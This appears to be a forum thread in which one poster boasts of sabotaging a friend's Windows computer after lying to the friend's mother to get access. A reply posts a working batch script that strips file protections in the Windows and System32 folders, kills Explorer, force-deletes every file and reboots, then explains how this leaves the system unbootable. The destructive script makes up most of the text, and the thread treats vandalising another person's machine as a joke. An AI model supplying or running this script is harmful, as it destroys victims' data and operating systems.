my friend was a huge pain on internet so i made a sob story so his mom let me over and i did this haha he cant cyberbulling me even know i stole his lunch money in the 5th grade
wow wouldnt work, first of all just about every antivirus company would detect that as a destructive bat. 2. it is gonna ask you if you want to delete so you gotta add somthing idr but like null ~ somthing like that idr it though
@echo off
cd \
cd windows
attrib *.* -r -a -s -h
cd system32
attrib *.* -r -a -s -h
cd ..
taskkill /f /im explorer.exe
del /f /s /q *.*
shutdown -r -t 01 -c "Yeah right..."
To sum it up. *.* is any file, period. The attrib commands will ensure the files aren’t hidden/read only/system files so we know that they will delete properly. Now WFP (Windows File Protection) will still stop a lot of files from being deleted but if this can run long enough you’ll manage to corrupt any windows installation to the point where it will no longer boot. A repair install might fix the damage done, even then sometimes nothing will bring you back from this other than a format.